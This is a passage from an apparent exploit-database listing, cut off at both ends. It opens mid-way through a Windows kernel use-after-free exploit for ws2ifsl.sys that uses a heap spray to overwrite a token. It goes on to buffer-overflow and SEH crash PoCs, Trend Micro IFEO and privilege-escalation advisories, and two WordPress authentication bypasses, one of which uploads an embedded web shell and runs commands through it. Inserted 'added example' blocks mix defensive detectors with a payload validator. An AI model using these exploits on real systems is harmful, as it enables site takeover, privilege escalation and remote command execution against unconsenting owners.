    eaBuffer->EaValueLength = sizeof(PROC_DATA);
    RtlCopyMemory(eaBuffer->EaName, "NifsPvd", (SIZE_T)eaBuffer->EaNameLength + 1);
    PROC_DATA * eaData = (PROC_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") - 4);
    if (!hAPCThread) {
        printf("[-] error thread not found\n");
        free(eaBuffer);
        return 0;
    }
    eaData->apcthread = (void*) hAPCThread; // thread must be in current process
    eaData->unknown1 = (void*) 0x2222222;   // APC Routine
    eaData->unknown2 = (void*) 0x3333333;   // cancel Rundown Routine
    eaData->unknown3 = (void*) 0x4444444;
    eaData->unknown4 = (void*) 0x5555555;
    NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
    if (status != STATUS_SUCCESS) {
        printf("[-] NtCreateFile error: %x \n", status);
        free(eaBuffer);
        return fileHandle;
    }
    free(eaBuffer);
    return fileHandle;
}

int DoHeapSpray(DWORD64 writeAddress, DWORD64 kthreadAddress) {
    DWORD64 nopPointer = GetGadgetAddr("xHalTimerWatchdogStop");
    if (!nopPointer) {
        printf("[-] xHalTimerWatchdogStop not found\n");
        return 0;
    }
    DWORD64 funPointer = GetGadgetAddr("SeSetAccessStateGenericMapping");
    if (!funPointer) {
        printf("[-] SeSetAccessStateGenericMapping not found\n");
        return 0;
    }
    UCHAR payload[0x120 - 0x48];
    memset(payload, 0x0,
sizeof(payload)); DWORD64 x = 0x41414141414141; memcpy(payload, &x, 8); x = 0x12121212; memcpy(payload + 8, &x, 8); x = kthreadAddress + OFFSET_LINKEDLIST; // apc linked list memcpy(payload + 0x10, &x, 8); x = kthreadAddress + OFFSET_LINKEDLIST; memcpy(payload + 0x18, &x, 8); x = funPointer; memcpy(payload + 0x20, &x, 8); // this is the RIP we want to execute, in case of NtTestAlert x = nopPointer; memcpy(payload + 0x28, &x, 8); // this is the RIP we want to execute, in case of rundown routine x = 0xffffffffffffffff; // this is to be written memcpy(payload + 0x30, &x, 8); x = 0xffffffffffffffff; // this is to be written, but it gets changed.. memcpy(payload + 0x38, &x, 8); x = 0x2424242424242424; memcpy(payload + 0x40, &x, 8); x = writeAddress; // this is where to write memcpy(payload + 0x48, &x, 8); for (size_t i = 0; i < 0x70; i++) { HANDLE readPipe; HANDLE writePipe; DWORD resultLength = 0; BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload)); if (!res) { printf("[-] error creating pipe\n"); return 0; } res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL); } return 1; } /* This function will trigger the use after free in ws2ifsl.sys and will try to reallocate the buffer with controlled content. */ void TriggerBug(HANDLE threadHandle, DWORD64 writeAddress, DWORD64 kthreadAddress, int id) { HANDLE procHandle = CreateProcessHandle(threadHandle); printf("[!] procHandle %x\n", (DWORD)procHandle); HANDLE sockHandle = CreateSocketHandle(procHandle); printf("[!] 
sockHandle %x\n", (DWORD)sockHandle); char* readBuffer = (char*)malloc(0x100); DWORD bytesRead = 0; IO_STATUS_BLOCK io; LARGE_INTEGER byteOffset; byteOffset.HighPart = 0; byteOffset.LowPart = 0; byteOffset.QuadPart = 0; byteOffset.u.LowPart = 0; byteOffset.u.HighPart = 0; ULONG key = 0; CloseHandle(procHandle); NTSTATUS ret = g_NtWriteFile(sockHandle, 0, 0, 0, &io, readBuffer, 0x100, &byteOffset, &key); // this close the objecte and we trigger the use after free CloseHandle(sockHandle); // this spray will reclaim the buffer if (!DoHeapSpray(writeAddress, kthreadAddress)) { printf("[-] error doHeapSpray\n"); return; } if (id == 1) { g_done1 = 1; } if (id == 2) { g_done2 = 1; } printf("[+] done\n"); Sleep(0x20); free(readBuffer); return; } /* This function resolves all function pointer for native api calls. */ bool InitFunctionPointers() { HMODULE hNtDll = NULL; hNtDll = LoadLibrary("ntdll.dll"); if (!hNtDll) { printf("error\n"); return false; } g_NtTestAlert = (NtTestAlert_t)GetProcAddress(hNtDll, "NtTestAlert"); if (!g_NtTestAlert) { printf("error\n"); return false; } g_NtWriteFile = (NtWriteFile_t)GetProcAddress(hNtDll, "NtWriteFile"); if (!g_NtWriteFile) { printf("[-] GetProcAddress() NtWriteFile failed.\n"); return false; } g_RtlGetVersion = (RtlGetVersion_t)GetProcAddress(hNtDll, "RtlGetVersion"); if (!g_NtWriteFile) { printf("[-] GetProcAddress() RtlGetVersion failed.\n"); return false; } return true; } int main() { // intialize event for thread synchronization g_Event1 = CreateEvent(0, 0, 0, 0); g_Event2 = CreateEvent(0, 0, 0, 0); g_Event3 = CreateEvent(0, 0, 0, 0); if (g_Event1 == INVALID_HANDLE_VALUE || !g_Event1) { printf("[-] CreateEvent failed\n"); return 0; } if (g_Event2 == INVALID_HANDLE_VALUE || !g_Event2) { printf("[-] CreateEvent failed\n"); return 0; } if (g_Event3 == INVALID_HANDLE_VALUE || !g_Event2) { printf("[-] CreateEvent failed\n"); return 0; } if (!InitFunctionPointers()) { printf("[-] InitFunctionPointers failed\n"); return 0; } HANDLE 
proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); if (!proc) { printf("[-] OpenProcess failed\n"); return 0; } HANDLE token = 0; if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token)) { printf("[-] OpenProcessToken failed\n"); return 0; } DWORD64 ktoken = GetKernelPointer(token, 0x5); DWORD64 where = ktoken + TOKEN_OFFSET; printf("[+] found token at: %p\n", (DWORD64) ktoken); // check the supported version of this exploit, otherwise we would crash RTL_OSVERSIONINFOW osversion; g_RtlGetVersion(&osversion); if (osversion.dwMajorVersion == 10 && osversion.dwBuildNumber == 18362) { printf("[+] version supported\n"); } else { printf("[-] sorry version not supported\n"); return 0; } HANDLE hAPCThread1 = CreateThread(0, 0, APCThread1, 0, 0, 0); if (hAPCThread1 == INVALID_HANDLE_VALUE || !hAPCThread1) { printf("[-] error CreateThread\n"); return 0; } HANDLE hAPCThread2 = CreateThread(0, 0, APCThread2, 0, 0, 0); if (hAPCThread2 == INVALID_HANDLE_VALUE || !hAPCThread2) { printf("[-] error CreateThread\n"); return 0; } DWORD64 threadAddrAPC1 = GetKernelPointer(hAPCThread1, 0x8); if (!threadAddrAPC1) { printf("[-] GetKernelPointer error \n"); return 0; } DWORD64 threadAddrAPC2 = GetKernelPointer(hAPCThread2, 0x8); if (!threadAddrAPC2) { printf("[-] GetKernelPointer error \n"); return 0; } // wait for threads to be initialized WaitForSingleObject(g_Event1, -1); WaitForSingleObject(g_Event2, -1); TriggerBug(hAPCThread1, where-8, threadAddrAPC1, 1); TriggerBug(hAPCThread2, where, threadAddrAPC2, 2); WaitForSingleObject(g_Event3, -1); ExitProcess(0); return 0; }
  18. # Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-16
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install APKF Product Key Finder
2. Run the python script, which creates a file (poc.txt)
3. Run the software, "Register -> Enter Registration Code"
4. Copy the characters from the file (poc.txt)
5. Paste the characters in the field 'Name' and click on 'Ok'
6. APKF Product Key Finder crashes
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created.")
  19. # Exploit Title: Torrent FLV Converter 1.51 Build 117 - Stack Overflow (SEH partial overwrite)
# Date: 2020-01-16
# Exploit Author: antonio
# Vendor Homepage: http://www.torrentrockyou.com/
# Software Link: http://www.torrentrockyou.com/download/trflvconverter.exe
# Version: 1.51 Build 117
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the
# Registration Code input field.

#!/usr/bin/python

nseh_offset = 4500
total = 5000

# badchars
# --------
# 0x00, 0x0a, 0x0d, 0x80
# 0xf0-0xff, 0xe0-0xef, 0x70-0x7a
# 0x61-0x6f, 0x9a, 0x9c, 0x9e

poc = ""
poc += "A" * (nseh_offset - 53)
poc += "\x90" * 53
poc += "\x7d\xcb\x90\x90"   # nSEH: jump backwards to NOPs: jge via SF = OF
poc += "\x7f\xb3\x45"       # SEH: pop pop ret, 3-byte partial overwrite

file = open("poc_seh.txt", "w")
file.write(poc)
file.close()
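Added example, not code from the advisory or its author: a partial-overwrite SEH payload like the one above only works if every byte survives the application's input filter and the short backward jump placed in nSEH really lands inside the NOP sled, so this script rebuilds the PoC from the advisory's constants and checks both, then reconstructs the 32-bit handler address that the 3-byte overwrite produces. The preserved fourth byte of the handler pointer is assumed to be 0x00 (the usual reason for writing only three bytes, since 0x00 is on the badchar list); the advisory does not state it.

```python
import struct

# Constants taken from the advisory.
NSEH_OFFSET = 4500
NOP_SLED_LEN = 53
JGE_BACK = b"\x7d\xcb"               # jge rel8; 0xcb is -53 as a signed byte
POP_POP_RET_LOW3 = b"\x7f\xb3\x45"   # low 3 bytes of the pop/pop/ret address

# Badchar ranges quoted in the advisory, as inclusive (low, high) pairs.
BADCHAR_RANGES = [
    (0x00, 0x00), (0x0a, 0x0a), (0x0d, 0x0d), (0x80, 0x80),
    (0xf0, 0xff), (0xe0, 0xef), (0x70, 0x7a),
    (0x61, 0x6f), (0x9a, 0x9a), (0x9c, 0x9c), (0x9e, 0x9e),
]


def is_badchar(b):
    return any(lo <= b <= hi for lo, hi in BADCHAR_RANGES)


def build_poc():
    """Rebuild the advisory's payload: filler, NOP sled, nSEH jump, partial SEH."""
    poc = b"A" * (NSEH_OFFSET - NOP_SLED_LEN)
    poc += b"\x90" * NOP_SLED_LEN
    poc += JGE_BACK + b"\x90\x90"    # nSEH (4 bytes): jump back, padded with NOPs
    poc += POP_POP_RET_LOW3          # SEH: only the low 3 bytes are overwritten
    return poc


def find_badchars(payload):
    """Sorted list of byte values in payload that the target mangles."""
    return sorted({b for b in payload if is_badchar(b)})


def jump_target_offset(poc):
    """Offset into poc where the rel8 jump stored at nSEH lands."""
    rel8 = struct.unpack("<b", poc[NSEH_OFFSET + 1:NSEH_OFFSET + 2])[0]
    # rel8 is relative to the end of the 2-byte jcc instruction at NSEH_OFFSET
    return NSEH_OFFSET + 2 + rel8


def lands_in_sled(poc):
    """True if the nSEH jump lands somewhere inside the NOP sled."""
    target = jump_target_offset(poc)
    return NSEH_OFFSET - NOP_SLED_LEN <= target < NSEH_OFFSET


def seh_address(poc, preserved_high_byte=0x00):
    """32-bit handler pointer after the 3-byte overwrite.

    The fourth byte is whatever the original handler pointer held; 0x00 is an
    assumption (not stated in the advisory) that explains why only three bytes
    are written, since 0x00 is a badchar.
    """
    low3 = poc[NSEH_OFFSET + 4:NSEH_OFFSET + 7]
    return struct.unpack("<I", low3 + bytes([preserved_high_byte]))[0]


if __name__ == "__main__":
    p = build_poc()
    print("payload length:", len(p))
    print("badchars present:", [hex(b) for b in find_badchars(p)])
    print("jump lands at offset", jump_target_offset(p), "in sled:", lands_in_sled(p))
    print("handler address: 0x%08x" % seh_address(p))
```

The same two checks apply to any rewrite of the payload: after swapping in a different pop/pop/ret or a longer sled, re-run find_badchars() and lands_in_sled() before sending it to the target.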
  20. # Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client < 1.9.4.5

#!/usr/bin/python3

import requests
import json
import argparse
import base64
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(site, username):
    # The request body is the literal prefix followed by the base64-encoded
    # JSON message; an "add_site" message carrying only the admin username
    # is answered with that user's login cookies.
    json_info = {"iwp_action": "add_site", "params": {"username": username}}
    try:
        return requests.post(
            site,
            timeout=5,
            verify=False,
            headers={"User-Agent": "raphaelrocks"},
            data="_IWP_JSON_PREFIX_{}".format(
                base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8")
            ),
        )
    except Exception as e:
        print("[-] HTTP Exploit Error: {}".format(e))
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
    parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
    args = parser.parse_args()

    site_exploit = exploit(args.url, args.username)
    if site_exploit and site_exploit.status_code == requests.codes.ok:
        cookie_string = "; ".join([str(x) + "=" + str(y) for x, y in site_exploit.cookies.items()])
        if cookie_string:
            print("[+] Use Cookies to Login: \n{}".format(cookie_string))
            exit(0)
    print("[-] Exploit Failed")
  21. # Exploit Title: Trend Micro Maximum Security 2019 - Arbitrary Code Execution
# Date: 2020-1-16
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.trendmicro.com
# Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15)
# Internet Security 2019 (v15), Antivirus + Security 2019 (v15)

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
[+] ISR: ApparitionSec

[Vendor]
www.trendmicro.com

[Product]
Trend Micro Security 2019 (Consumer) Multiple Products

Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft.

[Vulnerability Type]
Security Bypass Protected Service Tampering

[CVE Reference]
CVE-2019-19697

[Security Issue]
Trend Micro Maximum Security is vulnerable to arbitrary code execution, as it allows creation of a registry key to target a process running as SYSTEM. This can allow malware to gain elevated privileges to take over and shut down services that require SYSTEM privileges, like Trend Micro's "Asmp" service "coreServiceShell.exe", which does not allow Administrators to tamper with them. This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling them or otherwise preventing them from starting.

Note: administrator privileges are required to exploit this vulnerability.

[CVSS 3.0 Scores: 3.9]

[Affected versions]
Platform Microsoft Windows
Premium Security 2019 (v15)
Maximum Security 2019 (v15)
Internet Security 2019 (v15)
Antivirus + Security 2019 (v15)

[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx

[Exploit/POC]
1) Create an entry for the following registry key targeting "PtWatchdog.exe" and set the "debugger" string value to an arbitrary executable to gain SYSTEM privs.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe

2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM.

3) Restart the machine or wait until the service restarts; you then get SYSTEM and can disable the Trend Micro endpoint security coreServiceShell.exe service.

[Network Access]
Local

[Severity]
Low

[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor confirms issue: October 28, 2019
Vendor release date: January 14, 2020
January 16, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
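Added example, not part of the advisory: the primitive used above is the Image File Execution Options "Debugger" hijack, so the check a defender wants is an audit of every Debugger value under that key. The script below parses a text export of the IFEO key (for instance the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg`, which reg.exe writes as UTF-16 and which must be decoded to text first) and reports every image whose Debugger value is not on an allowlist. The .reg content is constructed to mirror the advisory's PtWatchdog.exe entry, and the allowlisted vsjitdebugger path is an assumption about what a given site considers legitimate.

```python
import re

IFEO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
            r"\CurrentVersion\Image File Execution Options")

# Debugger registrations a site treats as legitimate (assumed, site-specific).
DEFAULT_ALLOWLIST = (
    r"C:\Program Files (x86)\Microsoft Visual Studio\Common7\IDE\vsjitdebugger.exe",
)

# Constructed .reg export: the advisory's hijack of PtWatchdog.exe, plus two
# entries that must not fire (a non-Debugger value and an allowlisted debugger).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe]
"debugger"="C:\\Users\\Public\\payload.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\w3wp.exe]
"Debugger"="C:\\Program Files (x86)\\Microsoft Visual Studio\\Common7\\IDE\\vsjitdebugger.exe"
'''

_KEY_RE = re.compile(r"^\[(.+)\]$")
_STR_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def _unescape_reg_string(s):
    # .reg exports double every backslash and escape embedded quotes as \"
    return s.replace('\\"', '"').replace("\\\\", "\\")


def find_ifeo_debuggers(reg_text, allowlist=DEFAULT_ALLOWLIST):
    """Return [(image_name, debugger_command)] for each IFEO Debugger value not allowlisted."""
    findings = []
    image = None                      # image subkey we are currently inside, or None
    prefix = IFEO_KEY.lower() + "\\"
    for raw in reg_text.splitlines():
        line = raw.strip()
        km = _KEY_RE.match(line)
        if km:
            key = km.group(1)
            image = key[len(prefix):] if key.lower().startswith(prefix) else None
            continue
        if image is None:
            continue
        vm = _STR_VALUE_RE.match(line)
        # registry value names are case-insensitive: "debugger" and "Debugger" are the same value
        if not vm or vm.group(1).lower() != "debugger":
            continue
        cmd = _unescape_reg_string(vm.group(2))
        if any(cmd.lower().startswith(a.lower()) for a in allowlist):
            continue
        findings.append((image, cmd))
    return findings


if __name__ == "__main__":
    for image, cmd in find_ifeo_debuggers(SAMPLE_REG):
        print("IFEO debugger hijack: %s -> %s" % (image, cmd))
```

Run it against a fresh export rather than a stored baseline, and treat any hit whose Debugger points outside a known tools directory, or whose image is a security product's own process as in the advisory, as a persistence finding to be removed and traced back to the account that wrote it.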
  22. # Exploit Title: Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
# Date: 2020-01-16
# Exploit Author: B. Canavate
# Vendor Homepage: https://wptimecapsule.com/
# Software Link: https://wptimecapsule.com/
# Version: Wordpress Time Capsule Plugin < 1.21.16
# Tested on: LAMP stack with most recent Wordpress

---- code below ----

# PoC by: B. Canavate
# Based on the research done by the fine people at: https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
# GitHub repo with breakdown: https://github.com/SECFORCE/WPTimeCapsulePOC

import requests
import sys

if len(sys.argv) == 1:
    print("Usage: poc.py http://127.0.0.1/ - Get Admin cookie")
    print("       poc.py http://127.0.0.1/ shell - Get Admin Cookie + Upload a shell on /wp-content/plugins/shell/shell.php")
    print("       Shell usage: /shell.php?pass=mak3ithapp3n&cmd=COMMAND")
else:
    url = sys.argv[1]
    session = requests.Session()
    # A POST body consisting of the bare prefix is enough: the response carries
    # an admin login cookie without any authentication having taken place.
    rawBody = "IWP_JSON_PREFIX"
    headers = {"Referer": url}
    response = session.post(url, data=rawBody, headers=headers, verify=False)
    cookieadmin = None
    for cookie in response.cookies:
        if "logged" in cookie.name:
            cookieadmin = cookie
    response2 = session.get(url + "wp-admin/index.php", headers=headers, cookies=response.cookies, verify=False)
    if "Dashboard" in response2.text and cookieadmin is not None:
        print("This is the cookie that you are looking for :-)")
        print(cookieadmin.name + ":" + cookieadmin.value)
        if len(sys.argv) == 3 and sys.argv[2] == "shell":
            response = session.get(url + "/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd=", verify=False)
            if response.status_code != 200:
                paramsGet = {"action": "upload-plugin"}
                # The nonce and the cookies below are hard-coded from the author's test
                # instance; against another site they need the nonce from
                # plugin-install.php and the cookie obtained above.
                paramsPost = {"_wpnonce": "1ef2140910", "_wp_http_referer": "/wp-admin/plugin-install.php", "install-plugin-submit": "Install Now"}
                # shell.zip: a one-file plugin containing shell.php (pass=mak3ithapp3n&cmd=...)
                paramsMultipart = [('pluginzip', ('shell.zip', b"PK\x03\x04\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x00\x00shell.php\x85\x8d1O\xc30\x10\x85\xe7\xfaW\x9c\xaa\xaaM:4\xa0n\x86P\xa1\x10\x24\x18\xa0\x24\x94\x05!d\xdc\x0b\xb6\x88c+\xe7\x0c\x15\xea\x7f\xc7\xc9\x80\xaav\xe8-\xa7\xbb\xf7\xbd\xf7\xaeWN9\x06a\x92\xf9\xb0\xd6u\xf7\xad\x1bx\x12\x069\x94yv\xff\\d9\xacm\x06\xa5\xc2\xba>d6\xc5\x03\x07\xe5\xbd\x23\x9e\x24\x84\xb2\xb2\xad\xc4\x85\xb4f\x80\xee\x90d\xab\x9d\xd7\xb6\xe1\xf0\xd8\x91\x07\x01(h\x07\xf4\x9fs\xdbye[\x0e_\xc1\xa8\x86\xcf\x1b\xb64\x18.\x16\x97\x07\xc8\x99\xaay\xc2\x180\xd0U\xa4\x89\xd0G\x93\xcf\"\x7f\xd9\xe4\xe5\xeb\xfbL\x9a\xed\xec\x23\x86\xe9\x14N\x24'\x88\x82\x16\xff\xb2\x91\xae\xe0T\x814\x85\xb1\x11?K\xed\x95pn\xd9\x8c{t4\x09\x91\x90\xc2q\xc7U\x90hG\x1eM\xd4\x13q\x7fo5\x86\xb5g{\xb6\xbaa\x7fPK\x01\x02?\x03\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x24\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\x00\x00\x00\x00shell.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00\x09\x01\x00\x00\x00\x00", 'application/zip'))]
                headers = {"Origin": url, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0", "Referer": url + "/wp-admin/plugin-install.php", "Connection": "close", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Accept-Language": "en-GB,en;q=0.5"}
                cookies = {"wordpress_test_cookie": "WP+Cookie+check", "wordpress_5c016e8f0f95f039102cbe8366c5c7f3": "secforce%7C1579345389%7CVEj3PYaEDRwiYHj9dvd3H2813BfDsqNxAJQyF0N4nOa%7Ccd8ab0bf244d404dc2b3ec55335545553a8017c254357f76b061345dfa751545", "wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3": "secforce%7C1579345389%7CfoMJPKzwmHvHzKkdwvUcxUIXU327HQWR6Lrv1oP6qzA%7C2531f7ca8075fd9e0a56293dd7a627b2de1ddfe49ff34be9f0835e2a5e4cccb4", "wp-settings-time-1": "1579176444"}
                response = session.post(url + "/wp-admin/update.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)
            print("Now you have a shell! ")
            command = ""
            while command != "exit":
                command = str(input())
                response = session.get(url + "/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd=" + command, verify=False)
                print(response.text)
            print("Remember to delete the shell.php :-)")
    else:
        print("There was an error :(")
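Both PoCs on this page that target these two plugins (items 20 and 22) drive the same request format: a POST body that begins with the IWP_JSON_PREFIX marker, optionally followed by a base64-encoded JSON message. The detector below is an added example and is not part of either advisory; it decodes such bodies from a WAF or web-server body capture and flags the two shapes the exploits use, an add_site message that names a user and a bare prefix with no decodable payload. The sample bodies are constructed. Legitimate InfiniteWP panel traffic carries the same prefix, so a hit is a triage signal (check the source address against the panel you actually run) rather than proof of compromise.

```python
import base64
import json
import re

# Both plugins look for this marker at the start of the POST body. InfiniteWP
# Client's PoC wraps it in underscores, WP Time Capsule's PoC sends the bare
# word, so the pattern accepts either form.
PREFIX_RE = re.compile(rb"^_?IWP_JSON_PREFIX_?")

# Actions worth alerting on when they arrive from the open internet.
SENSITIVE_ACTIONS = {"add_site"}


def make_iwp_body(msg):
    """Encode a message the way the InfiniteWP PoC does (constructed helper)."""
    return b"_IWP_JSON_PREFIX_" + base64.b64encode(json.dumps(msg).encode("utf-8"))


def decode_iwp_body(body):
    """Return (prefix_present, decoded_message_or_None) for a raw POST body."""
    m = PREFIX_RE.match(body)
    if not m:
        return False, None
    tail = body[m.end():]
    if not tail:
        return True, None
    try:
        return True, json.loads(base64.b64decode(tail, validate=True))
    except ValueError:   # binascii.Error and JSONDecodeError both subclass ValueError
        return True, None


def classify(body):
    """Label one body: 'benign', 'iwp', 'prefix-without-payload' or 'alert:<action>:<user>'."""
    present, msg = decode_iwp_body(body)
    if not present:
        return "benign"
    if msg is None:
        return "prefix-without-payload"      # the WP Time Capsule PoC shape
    action = msg.get("iwp_action") if isinstance(msg, dict) else None
    if action in SENSITIVE_ACTIONS:
        user = (msg.get("params") or {}).get("username")
        return "alert:{}:{}".format(action, user)
    return "iwp"


def triage(samples):
    """Classify a dict of {name: body}; returns {name: label}."""
    return {name: classify(body) for name, body in samples.items()}


# Constructed sample bodies, as a request-body capture would hold them.
SAMPLES = {
    "infinitewp_poc": make_iwp_body({"iwp_action": "add_site", "params": {"username": "admin"}}),
    "timecapsule_poc": b"IWP_JSON_PREFIX",
    "normal_login": b"log=admin&pwd=hunter2&wp-submit=Log+In",
}


if __name__ == "__main__":
    for name, label in triage(SAMPLES).items():
        print("%-16s %s" % (name, label))
```

Feeding this from an access log needs body logging (for example a WAF's request-body capture), since the marker never appears in the URL; a cheaper first filter is to route every POST whose body starts with an optional underscore and IWP_JSON_PREFIX into this classifier.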
  23. # Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-16
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1. Download and install GTalk Password Finder
2. Run the python script, which creates a file (poc.txt)
3. Run the software, "Register -> Enter Registration Code"
4. Copy the characters from the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. GTalk Password Finder crashes
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created.")
  24. # Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation
# Date: 2020-1-16
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.trendmicro.com
# Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15)
# Internet Security 2019 (v15), Antivirus + Security 2019 (v15)

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.trendmicro.com

[Product(s)]
Trend Micro Security (Consumer) Multiple Products

Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft.

[Vulnerability Type]
Persistent Arbitrary Code Execution

[CVE Reference]
CVE-2019-20357

[CVSSv3 Scores: 6.7]

[Security Issue]
Trend Micro Security can potentially allow an attacker to use a malicious program to escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system.

[Product Affected Versions]
Platform Microsoft Windows
Premium Security 2019 (v15) and 2020 (v16)
Maximum Security 2019 (v15) and 2020 (v16)
Internet Security 2019 (v15) and 2020 (v16)
Antivirus + Security 2019 (v15) and 2020 (v16)

[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx

[Exploit/POC]
Compile C test code "Program.c"

#include <stdio.h>
#include <stdlib.h>

void main(void)
{
    puts("Done!");
    system("pause");
}

1) Place under c:\ dir.
2) Reboot the machine; the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity.

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor advisory: January 15, 2020
January 16, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  25. # Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
# Exploit Author: Javier Olmedo
